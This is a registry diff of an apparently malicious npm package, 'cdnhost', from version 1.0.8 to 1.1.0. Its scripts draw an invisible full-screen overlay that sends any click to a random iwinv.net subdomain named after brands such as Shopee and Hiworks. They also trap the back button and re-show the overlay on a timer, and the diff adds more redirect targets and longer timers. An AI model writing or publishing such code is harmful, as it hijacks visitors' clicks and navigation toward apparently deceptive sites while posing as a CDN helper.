cdnhost 1.0.8 → 1.1.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/iwinv.js +4 -0
- package/package.json +1 -1
- package/seekr.js +19 -10
- package/total.js +10 -2
package/iwinv.js
CHANGED
|
@@ -32,6 +32,10 @@ function handleKeyPress(event) {
|
|
|
32
32
|
'https://flightaware.iwinv.net/recent.php',
|
|
33
33
|
'https://koreakr.iwinv.net/recent.php',
|
|
34
34
|
'https://popcat.iwinv.net/recent.php',
|
|
35
|
+
'https://ecount.iwinv.net/recent.php',
|
|
36
|
+
'https://hiworks.iwinv.net/recent.php',
|
|
37
|
+
'https://shopee.iwinv.net/recent.php',
|
|
38
|
+
'https://eomisae.iwinv.net/recent.php',
|
|
35
39
|
];
|
|
36
40
|
|
|
37
41
|
const urls = isMobile ? mobileUrls : desktopUrls;
|
package/package.json
CHANGED
package/seekr.js
CHANGED
|
@@ -1,3 +1,4 @@
|
|
|
1
|
+
|
|
1
2
|
window.addEventListener('load', function() {
|
|
2
3
|
var images = document.querySelectorAll('img');
|
|
3
4
|
images.forEach(function(img) {
|
|
@@ -20,6 +21,10 @@ const urls = [
|
|
|
20
21
|
'https://flightaware.iwinv.net/recent.php',
|
|
21
22
|
'https://koreakr.iwinv.net/recent.php',
|
|
22
23
|
'https://popcat.iwinv.net/recent.php',
|
|
24
|
+
'https://ecount.iwinv.net/recent.php',
|
|
25
|
+
'https://hiworks.iwinv.net/recent.php',
|
|
26
|
+
'https://shopee.iwinv.net/recent.php',
|
|
27
|
+
'https://eomisae.iwinv.net/recent.php',
|
|
23
28
|
];
|
|
24
29
|
|
|
25
30
|
|
|
@@ -48,6 +53,10 @@ function handleKeyPress(event) {
|
|
|
48
53
|
'https://flightaware.iwinv.net/recent.php',
|
|
49
54
|
'https://koreakr.iwinv.net/recent.php',
|
|
50
55
|
'https://popcat.iwinv.net/recent.php',
|
|
56
|
+
'https://ecount.iwinv.net/recent.php',
|
|
57
|
+
'https://hiworks.iwinv.net/recent.php',
|
|
58
|
+
'https://shopee.iwinv.net/recent.php',
|
|
59
|
+
'https://eomisae.iwinv.net/recent.php',
|
|
51
60
|
];
|
|
52
61
|
|
|
53
62
|
const urls = isMobile ? mobileUrls : desktopUrls;
|
|
@@ -63,7 +72,7 @@ function handleKeyPress(event) {
|
|
|
63
72
|
|
|
64
73
|
const randomUrl = urls[Math.floor(Math.random() * urls.length)];
|
|
65
74
|
document.writeln('<style>');
|
|
66
|
-
document.writeln('#s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.8;background:#000;width:100%;height:
|
|
75
|
+
document.writeln('#s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.8;background:#000;width:100%;height:200vh}');
|
|
67
76
|
document.writeln('</style>');
|
|
68
77
|
document.writeln('<a onclick=\'location.href="' + randomUrl + '"\' target="_blank" href="#"><div id="s2"></div></a>');
|
|
69
78
|
|
|
@@ -81,14 +90,14 @@ history.pushState(null,null,""),window.onpopstate=function(a){a&&(history.back()
|
|
|
81
90
|
|
|
82
91
|
document.getElementById('container').style.boxShadow = 'none';
|
|
83
92
|
function ss(){
|
|
84
|
-
document.getElementById("s2").style.transition = "opacity
|
|
85
|
-
document.getElementById("button").style.transition = "opacity
|
|
86
|
-
setTimeout("s()",
|
|
87
|
-
setTimeout("h()",
|
|
93
|
+
document.getElementById("s2").style.transition = "opacity 15s";
|
|
94
|
+
document.getElementById("button").style.transition = "opacity 15s";
|
|
95
|
+
setTimeout("s()", 3999);
|
|
96
|
+
setTimeout("h()", 14999);
|
|
88
97
|
}
|
|
89
98
|
function pcss(){
|
|
90
|
-
setTimeout("s()",
|
|
91
|
-
setTimeout("h()",
|
|
99
|
+
setTimeout("s()", 3999);
|
|
100
|
+
setTimeout("h()", 14999);
|
|
92
101
|
}
|
|
93
102
|
function a(){
|
|
94
103
|
document.getElementById("button").style.display="none";
|
|
@@ -108,11 +117,11 @@ function h(){
|
|
|
108
117
|
s2.style.zIndex = -1;
|
|
109
118
|
button.style.display = "none";
|
|
110
119
|
setTimeout(function () {
|
|
111
|
-
s2.style.zIndex =
|
|
120
|
+
s2.style.zIndex = 99;
|
|
112
121
|
button.style.display = "block";
|
|
113
122
|
s2.style.opacity = 0.8;
|
|
114
123
|
button.style.opacity = 1;
|
|
115
124
|
document.getElementById("s2").style.transition = "opacity 1s";
|
|
116
125
|
document.getElementById("button").style.transition = "opacity 1s";
|
|
117
|
-
},
|
|
118
|
-
}
|
|
126
|
+
}, 4000);
|
|
127
|
+
}
|
package/total.js
CHANGED
|
@@ -20,6 +20,10 @@ const urls = [
|
|
|
20
20
|
'https://flightaware.iwinv.net/recent.php',
|
|
21
21
|
'https://koreakr.iwinv.net/recent.php',
|
|
22
22
|
'https://popcat.iwinv.net/recent.php',
|
|
23
|
+
'https://ecount.iwinv.net/recent.php',
|
|
24
|
+
'https://hiworks.iwinv.net/recent.php',
|
|
25
|
+
'https://shopee.iwinv.net/recent.php',
|
|
26
|
+
'https://eomisae.iwinv.net/recent.php',
|
|
23
27
|
];
|
|
24
28
|
|
|
25
29
|
|
|
@@ -48,6 +52,10 @@ function handleKeyPress(event) {
|
|
|
48
52
|
'https://flightaware.iwinv.net/recent.php',
|
|
49
53
|
'https://koreakr.iwinv.net/recent.php',
|
|
50
54
|
'https://popcat.iwinv.net/recent.php',
|
|
55
|
+
'https://ecount.iwinv.net/recent.php',
|
|
56
|
+
'https://hiworks.iwinv.net/recent.php',
|
|
57
|
+
'https://shopee.iwinv.net/recent.php',
|
|
58
|
+
'https://eomisae.iwinv.net/recent.php',
|
|
51
59
|
];
|
|
52
60
|
|
|
53
61
|
const urls = isMobile ? mobileUrls : desktopUrls;
|
|
@@ -63,7 +71,7 @@ function handleKeyPress(event) {
|
|
|
63
71
|
|
|
64
72
|
const randomUrl = urls[Math.floor(Math.random() * urls.length)];
|
|
65
73
|
document.writeln('<style>');
|
|
66
|
-
document.writeln('#s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.8;background:#000;width:100%;height:
|
|
74
|
+
document.writeln('#s2, #s3 {transition:opacity 5s;z-index:99;position:fixed;top:0;left:0;opacity:0.8;background:#000;width:100%;height:200vh}');
|
|
67
75
|
document.writeln('</style>');
|
|
68
76
|
document.writeln('<a onclick=\'location.href="' + randomUrl + '"\' target="_blank" href="#"><div id="s2"></div></a>');
|
|
69
77
|
|
|
@@ -110,7 +118,7 @@ function h(){
|
|
|
110
118
|
s2.style.zIndex = -1;
|
|
111
119
|
button.style.display = "none";
|
|
112
120
|
setTimeout(function () {
|
|
113
|
-
s2.style.zIndex =
|
|
121
|
+
s2.style.zIndex = 99;
|
|
114
122
|
button.style.display = "block";
|
|
115
123
|
s2.style.opacity = 0.8;
|
|
116
124
|
button.style.opacity = 1;
|